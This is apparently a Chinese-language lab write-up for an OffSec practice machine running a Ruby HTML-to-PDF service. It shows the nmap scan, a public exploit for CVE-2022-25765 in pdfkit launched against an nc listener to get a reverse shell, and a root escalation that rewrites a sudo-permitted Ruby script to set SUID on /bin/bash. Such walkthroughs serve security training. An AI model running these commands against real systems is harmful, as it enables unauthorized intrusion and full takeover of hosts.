主要知识点
- 观察错误信息,找出关键点
- 观察用户权限
具体步骤
执行nmap扫描,发现3000端口开放了http服务
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-09 14:43 UTC
Nmap scan report for #remote_ip#
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open http WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/9%OT=22%CT=1%CU=33027%PV=Y%DS=2%DC=T%G=Y%TM=668D4
OS:CBA%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%II=I%TS=A)OPS(O1
OS:=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW
OS:7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=
OS:Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 0.66 ms pg-bafw54.offseclabs.com (192.168.50.254)
2 1.25 ms 192.168.54.22
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.70 seconds
打开后,发现如下,看起来是个Ruby的HTML转PDF的页面,参数是url,输入http://google.com的话,会得到一张PDF
如果输入http://www.baidu.com的话,则会报错,从错误页面中发现wkhtmltopdf和pdfkit.rb信息.
google pdfkit exploit 发现有CVE-2022-25765漏洞可以利用
下载后现在本地执行nc -nlvp 9000后再执行
python 51293.py -s #local_ip# 9000 -w http://#remote_ip#:3000/pdf -p url
发现reverse shell已经建立,且可以执行 sudo /usr/bin/ruby /home/andrew/app/app.rb,并不需要密码验证
listening on [any] 9000 ...
connect to [#local_ip#] from (UNKNOWN) [#remote_ip#] 42544
id
uid=1001(andrew) gid=1001(andrew) groups=1001(andrew),27(sudo)
sudo -l
Matching Defaults entries for andrew on rubydome:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User andrew may run the following commands on rubydome:
(ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
pwd
/home/andrew/app
修改/home/andrew/app/app.rb文件,赋予/bin/bash SUID权限
echo 'cmd = "chmod +s /bin/bash"
system( cmd )
' > app.rb
cat app.rb
cmd = "chmod +s /bin/bash"
system( cmd )
执行如下代码片段后,发现root权限已经获得
sudo /usr/bin/ruby /home/andrew/app/app.rb
ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan 6 2022 /bin/bash
/bin/bash -p
id
uid=1001(andrew) gid=1001(andrew) euid=0(root) egid=0(root) groups=0(root),27(sudo),1001(andrew)